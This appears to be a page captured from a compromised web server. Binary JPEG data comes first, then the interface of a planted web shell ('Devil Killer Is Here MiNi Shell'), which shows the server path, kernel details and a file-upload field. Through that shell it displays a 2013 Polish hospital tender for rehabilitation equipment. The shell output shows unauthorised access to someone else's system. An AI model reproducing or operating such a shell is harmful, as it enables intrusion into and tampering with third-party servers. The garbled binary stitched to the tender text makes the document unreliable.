JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130409/52871-N-2013.html

<p class="kh_header"><b>Opole Lubelskie: Wyposażenie dla działów rehabilitacji</b><br>
<b>Numer ogłoszenia: 52871 - 2013; data zamieszczenia: 09.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Przemysłowa 4a, 24-300 Opole Lubelskie, woj. lubelskie, tel. 81 8272278, faks 81 8272278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozopolelubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie dla działów rehabilitacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup wraz z dostawą fabrycznie nowego sprzętu medycznego dla działów rehabilitacji :
Ośrodka Rehabilitacji Dziennej Szpitala w Poniatowej ul. Fabryczna 18
Działu Rehabilitacji Leczniczej nr 2 w Opolu Lubelskim ul. Przemysłowa 4b
Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Opolu Lubelskim 

Lp
Nazwa sprzętu  parametry  wartość wymagana

ZADANIE NR 1 - Aparat do krioterapii szt. 2
1.Czynnik chłodzący - ciekły azot  TAK
2.Aparat sterowany elektronicznie TAK
3.Pomiar temperatury powierzchniowej skóry pacjenta  TAK
4.Aparat nieciśnieniowy TAK
5.Sterowanie urządzeniem za pomocą dużego dotykowego ekranu LCD na którym uwidocznione są wszystkie parametry zabiegu  TAK
6.Diody kontroli temperatury umieszczone w dyszy zabiegowej TAK
7.Intensywność schładzania uzyskiwana poprzez płynną regulację siły nadmuchu TAK
8.Niesztywniejący i nieprzemarzający przewód kriogeniczny  TAK
9.Płynna regulacja temperatury do - 160 st. C  TAK
10.Możliwość regulacji i kontroli czasu pracy i intensywności strumienia wylotowego
   TAK
11.Zbiornik azotu o pojemności  60 l - 1 szt.  TAK
12.Mobilna podstawa przystosowana do umieszczenia 60 - litrowego zbiornika TAK
13.Wagowy wskaźnik ilości azotu w zbiorniku  TAK
14.Instrukcja obsługi w języku polskim  TAK
15.Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
16.Termin gwarancji min. 12 miesięcy  TAK

ZADANIE NR 2 - Wysokoenergetyczny laser biostymulacyjny - szt. 1
1  Typ źródła -  laser diodowy   TAK
2 Długość fali światła w zakresie biostymulacyjnym 800nm i 970 nm +- 15nm  TAK
3 Moc max. CW  12.0 W +-3%  TAK
4 Moc min. CW  0.1 W +-3%  TAK
5 Moc (Intense Super Pulse) pozwalająca redukować efekt termiczny i zwiększać głębokość działania laseroterapii regulowana do 15W  TAK
6 Modalność emisji promieniowania CW (fale ciągłe) lub modulowane (1Hz do 20 kHz, cykle pracy do 50%) lub ISP (Intense Super Pulse)  TAK
7 Kolorowy ekran dotykowy  TAK
8 Rozmiar (szerokość, długość, wysokość) 180 x 200 x 190 mm +- 10%  TAK
9 Laser przenośny. Waga max. 1300g (z baterią i sterownikiem) TAK
10 Dwie pary okularów ochronnych do laseroterapii w zestawie TAK
11 Rękojeść z regulowaną z wiązką optyczną i ręcznym przełącznikiem TAK
12 Baza jednostek chorobowych  TAK
13 Możliwość tworzenia i zapisywania własnych terapii TAK
14 klasa II, typ B wg DIN EN ISO 60601-1:2006 o bezpieczeństwie elektrycznym TAK
15 klasa IIb wg dyrektywy 93)42)CEE o sprzęcie medycznym  TAK
16 klasa B wg IEC 60601-1-2:2007 o kompatybilmości elektromagnetycznej  TAK
17 klasa lasera IV wg DIN EN 60825-1:2008 o urządzeniach laserowych  TAK
18 Instrukcja obsługi w języku polskim  TAK
19 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
20 Termin gwarancji min. 12 miesięcy TAK

ZADANIE NR 3 - Aparat do elektroterapii szt. 1
1 Kolorowy ekran dotykowy minimum 10 TAK
2 Leksykon leczenia zawierający charakterystyki schorzeń, proponowane sposoby leczenia, zdjęcia pokazujące sposób wykonywania terapii TAK
3 Możliwość rozszerzenia leksykonu leczenia TAK
4 Dowolnie programowalna pamięć TAK
5 Kartoteka pacjentów TAK
6 Prądy przeciwbólowe, interferencja dwubiegunowa, prądy Kotza, asymetryczny dwufazowy prąd impulsowy, symetryczny dwufazowy prąd impulsowy, prąd impulsowy prostokątny, prąd impulsowy  trójkątny, mikroprądy, HV, prądy diadynamiczne, przerywany prąd stały o średniej częstotliwości, ciągły galwaniczny prąd stały, TENS burst , napięcie stałe ) prąd stały, wektor dipolowy, wektor izoplanarny, wektor manualny, klasyczna interferencja, automatyczny wektor dipolowy, półfale sinusoidalne, prąd progowy, prąd eksponencjalny, prąd Träberta (UR), TENS)HV, TENS)Częstotliwość średnia, prąd średniej częstotliwości o przebiegu sinusoidalnym, prąd udarowy. TAK
7 Duże możliwości regulacji parametrów wykonywanych zabiegów. TAK
8 Dwa kanały do terapii prądami w zależności od potrzeb zależne bądź w pełni niezależne od siebie. TAK
9 Elektrodiagnostyka TAK
10 Ciągły podgląd pracy wszystkich kanałów urządzenia ( 2 kanały elektroterapii) oraz urządzeń podłączonych (vacuum)  TAK
11 Wskazanie oddanej mocy: stale widoczne na wyświetlaczu TAK
12 Wskazanie przyłączenia  TAK
13 Wskazanie pozostałego czasu trwania zabiegu  TAK
14 Możliwość podłączenia akumulatora TAK
15 Pobór mocy: do 20 W TAK
16 Zasilanie: 230V)50 Hz TAK
17 Masa: do 2,8 kg TAK
18 Wymiary 290 x 120 x 265 mm +- 5% TAK
19 Instrukcja obsługi w języku polskim TAK
20 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
21 Termin gwarancji min. 12 miesięcy TAK

ZADANIE NR 4 - Aparat do ultrafonoforezy  szt. 1
1 Kolorowy ekran dotykowy min. 10 cali TAK
2 Leksykon leczenia zawierający charakterystyki schorzeń, proponowane sposoby leczenia, zdjęcia pokazujące sposób wykonywania terapii TAK
3 Możliwość rozszerzenia Leksykonu leczenia TAK
4 Dowolnie programowalna pamięć TAK
5 Kartoteka pacjentów TAK
6 Duże możliwości regulacji parametrów wykonywanych zabiegów. TAK
7 Ciągły podgląd pracy wszystkich kanałów urządzenia  TAK
8 Wieloczęstotliwościowa głowica ultradźwiękowa 1)3 MHz, pow. 4 cm2  TAK
9 Moc ultradźwięków - emisja ciągła: 2 W)cm2 przy częstotliwości 1 MHz; 1 W)cm2 przy częstotliwości 3 MHz TAK
10 Moc ultradźwięków - emisja impulsowa: 3 W/cm2 przy częstotliwości 1 MHz; 2 W)cm2 przy częstotliwości 3 MHz TAK
11 Czas trwania impulsu: 2,4,6,10 ms TAK
12 Czas trwania przerwy: 20 ms  TAK
13 Wskazanie oddanej mocy: stale widoczne na wyświetlaczu TAK
14 Wskazanie przyłączenia: tak  TAK
15 Wskazanie pozostałego czasu trwania zabiegu: tak  TAK
16 ERA (skutecznie promieniująca powierzchnia): 3,6 cm2 +- 10%  TAK
17 Możliwość podłączenia akumulatora TAK
18 Pobór mocy: do 20 W  TAK
19 Zasilanie: 230V)50 Hz TAK
20 Masa: do 3,5 kg  TAK
21 Wymiary 290 x 120 x 265 mm +- 5%  TAK
22 Instrukcja obsługi w języku polskim TAK
23 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
24 Termin gwarancji min. 12 miesięcy

ZADANIE NR 5 - Osprzęt do UGUL (linki, podwieszki, obciążniki) kpl. 1

1 Linka długość 1600 mm     szt. 8  TAK
2 Linka długość  960 mm     szt. 6 TAK
3 Linka długość 2450 mm     szt. 1 TAK
4 Linka długość 5720 mm     szt. 1 TAK
5 Linka długość 3750 mm     szt. 3 TAK
6 Podwieszka przedramion i podudzi 100x420 szt. 4 TAK
7 Podwieszka ud i ramion  145x540 szt. 4  TAK
8 Podwieszka pod miednicę 230x750 szt. 2 TAK
9 Podwieszka klatki piersiowej 225x675)340x100 szt. 1 TAK
10 Podwieszka pod głowę 150x530 szt. 1 TAK
11 Podwieszka stóp 75x610 szt. 4 TAK
12 Podwieszka dwustawowa pelota 160x80 pas 40x1350 szt. 4 TAK
13 Pas do wyciągu za miednicęę uniwersalny 1330x170 szt. 1  TAK
14 Kamaszek szt. 1 TAK
15 Ciężarek miękki 0,5 kg szt. 2  TAK
16 Ciężarek miękki 1,0 kg szt. 2 TAK
17 Ciężarek miękki 1,5 kg szt. 2 TAK
18 Ciężarek miękki 2,0 kg szt. 2 TAK
19 Ciężarek miękki 2,5 kg szt. 2 TAK
20 Ciężarek miękki 3,0 kg szt. 1 TAK
21 Esik szt. 30 TAK

ZADANIE NR 6 - Dysk sensoryczny, korekcyjny szt. 1
TAK
1 Średnica 33 cmTAK
2 Wypełniony powietrzem  TAK
3 Posiadający wypustki z jednej strony o wysokości około 5mm TAK
4 Gładki ze strony drugiej TAK
5 Zaworek pozwalający na regulację twardości TAK

ZADANIE NR 7 - Przyrząd do ćwiczeń stawu skokowego (krzyżak) szt. 1

1 Do ćwiczeń stawu skokowego wolnych i z obciążeniem w osi wzdłużnej i poprzecznej stopy TAK
2 Możliwość blokady obrotu stopy wokół każdej z osi oraz nakładanie obciążeń w tych kierunkach. TAK
3 Obciążniki  - 4 szt. - 1kg. TAK

ZADANIE NR 8 - Wałki rehabilitacyjne szt. 2
1 Wałek duży: średnica 40-50 cm, długość 60 cm, materiał zmywalny  szt. 1 TAK
2 Wałek długi: średnica 30 cm, długość 60 cm , materiał zmywalny  szt. 1 TAK

ZADANIE NR 9 - Materac rehabilitacyjny 3-częściowy, składany szt. 2

1 wymiary: 195-200 cm x 100 cm x 5cm TAK
2 twardość pianki R-70 TAK
3 składany 3-częściowy TAK
4 materac obszyty materiałem skóropodobnym TAK

ZADANIE NR 10 - Komplet taśm rehabilitacyjnych kpl. 2

1 Komplet szt. 1  taśm mniejszego oporu składający się z 3 szt. taśm
Taśmy: żółta, czerwona, zielona.
Wszystkie 3 taśmy o długości 1,5 m. TAK
2 Komplet szt. 1 taśm większego oporu składający się z 2 szt. taśm.
Taśmy: niebieska, czarna.
Wszystkie 2 taśmy o długości 1,5 m. TAK

ZADANIE NR 11 - Szyna do ćwiczeń biernych kończyny dolnej szt. 1
1 Szyna do ćwiczeń biernych kończyny dolnej TAK
2 Bierna mobilizacja st. biodrowego w zakresie 10°do70°  i kolanowego w zakresie min.  0°do110° TAK
3 Bierna mobilizacja stawu skokowego w zakresie min. 20°do -40° TAK
4 Automatyczne zwiększanie wyprostu, zgięcia TAK
5 Funkcja rozgrzewki TAK
6 Możliwość współpracy z kartą pamięci TAK
7 Karta pamięci - 10 szt. TAK
8 Wózek transportowy pod urządzenie TAK
9 Możliwość regulacji siły i czasu trwania ćwiczeń TAK
10 Możliwość regulacji prędkości ruchu TAK
11 Ergonomiczna i solidna konstrukcja pozwalająca na wygodne transportowanie urządzenia TAK
12 Pilot umożliwiający pacjentowi przerwanie ruchu TAK
13 Możliwość regulacji długości poszczególnych elementów, pozwalających na bardzo dokładne umiejscowienie osi obrotu ruch TAK
14 Instrukcja obsługi w języku polskim TAK
15 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
16 Termin gwarancji min. 12 miesięcy TAK

ZADANIE NR 12 - Diatermia krótkofalowa szt. 1
1 Diatermia kondensatorowa i indukcyjna  TAK
2 Ekranowane elektrody, przewody elektrod, oraz generatory TAK
3 Czteroprzegubowe ramiona elektrod umożliwiający duży zakres ustawień TAK
4 Znamionowa częstotliwość: 27,12 MHz TAK
5 Ekwiwalent mocy 400 W TAK
6 Moc na wejściu RF (-praca ciągła - 200W, nastawiana skokowo; - praca impulsowa - 30 W, nastawiana skokowo) TAK
7 Parametry impulsów (- częstotliwość powtarzania impulsów - 70 Hz( 350Hz; - szerokość impulsów - 2 ms (0,4 ms; moc w szczycie - 400 W) TAK
8 Czas ekspozycji: 0d 0 do 30 min. nastawiany skokowo TAK
9 Praca diatermii jest cały czas kontrolowana przez mikroprocesor TAK
10 Kontrola prawidłowości ustawień pacjenta względem elektrod TAK
11 Aparat po uruchomieniu przeprowadza autotest i potwierdza swą gotowość do pracy TAK
12 Każda nieprawidłowość w pracy urządzenia lub błąd w obsłudze sygnalizowany jest dźwiękowo i na wyświetlaczu. TAK
13 Podczas wystąpienia nieprawidłowości urządzenie zeruje wartość emitowanej dawki
TAK
14 Wymiary (wys. x szer. x głęb.)
85 x 38 x 38 cm +- 3% TAK
15 Masa 40 kg +- 3% TAK
16 Napięcie 230 V TAK
17 Pobór mocy 700 VA TAK
18 Pobór mocy przy pracy jałowej 100 VA TAK
19 Klasa ochronności i typ ochrony IP 20 BF TAK
20 Wyposażenie:
1) Triploda 15 x 35  cm +- 3%
2)Elektroda indukcyjna śr. 140 mm += 3% 1 szt.
3) Przewód do elektrody indukcyjnej szt. 2   TAK
21 Instrukcja obsługi w języku polskim   TAK
22 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu.  TAK
23 Termin gwarancji min. 12 miesięcy TAK

ZADANIE NR 13 - Fotel do ćwiczeń stawu kolanowego szt. 1
1 przeznaczony do ćwiczeń wspomaganych biernych i czynnych wolnych i z oporem stawów kolanowych   TAK
2 wyposażonych w dwie głowice do ćwiczeń oporowych TAK
3 wyposażony w pas do stabilizacji ud, miednicy i klatki piersiowej TAK
4 wysokość siedziska 70 cm (+-5 %)  TAK
5   wysokość całkowita 155 cm (+-5%) TAK
6 masa max 50 kg  TAK
7 szerokość siedziska 54 cm (+- 5%) TAK
8 długość rozłożonego fotela 168 cm (+- 5%) TAK
9 obciążenie 10 kg (+- 5%) TAK
10 Instrukcja obsługi w języku polskim TAK
11 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
12 Termin gwarancji min. 12 miesięcy TAK.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy 
        prawa nakładają obowiązek ich posiadania;
- warunek ten zostanie spełniony jeżeli:
         a) wykonawca  złoży  pisemne oświadczenie o treści stanowiącej  Załącznik nr 3; 
         b) koncesję lub zezwolenie  na prowadzenie działalności gospodarczej w zakresie objętym 
              zamówieniem publicznym , do których w/w dokument jest wymagany przepisami prawa;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym  do wykonania     zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują  osobami zdolnymi do wykonania   zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniajacej wykonanie zamówienia
   - warunek  ten zostanie spełniony jeżeli wykonawca :
   a) posiada na rachunku bankowym  środki finansowe w kwocie  200 000,00 zł.
     lub posiada zdolność kredytową do kwoty  200 000,00zł.
     b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności    
       związanej  z przedmiotem zamówienia i suma ubezpieczenia wynosi co najmniej 500 000,00zł. oraz  nie podlegają wykluczeniu z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spzozopolelubelskie.pl/index.php?option=com_docman&task=cat_view&gid=287&Itemid=115<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 24-300 Opole Lubelskie, ul. Przemysłowa 4a, 24-300 Opole Lubelskie, pok.nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2013 godzina 13:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej, 24-300 Opole Lubelskie, ul. Przemysłowa 4a, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do krioterapii szt. 2
1.Czynnik chłodzący - ciekły azot  TAK
2.Aparat sterowany elektronicznie TAK
3.Pomiar temperatury powierzchniowej skóry pacjenta  TAK
4.Aparat nieciśnieniowy TAK
5.Sterowanie urządzeniem za pomocą dużego dotykowego ekranu LCD na którym uwidocznione są wszystkie parametry zabiegu  TAK
6.Diody kontroli temperatury umieszczone w dyszy zabiegowej TAK
7.Intensywność schładzania uzyskiwana poprzez płynną regulację siły nadmuchu TAK
8.Niesztywniejący i nieprzemarzający przewód kriogeniczny  TAK
9.Płynna regulacja temperatury do - 160 st. C  TAK
10.Możliwość regulacji i kontroli czasu pracy i intensywności strumienia wylotowego
   TAK
11.Zbiornik azotu o pojemności  60 l - 1 szt.  TAK
12.Mobilna podstawa przystosowana do umieszczenia 60 - litrowego zbiornika TAK
13.Wagowy wskaźnik ilości azotu w zbiorniku  TAK
14.Instrukcja obsługi w języku polskim  TAK
15.Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
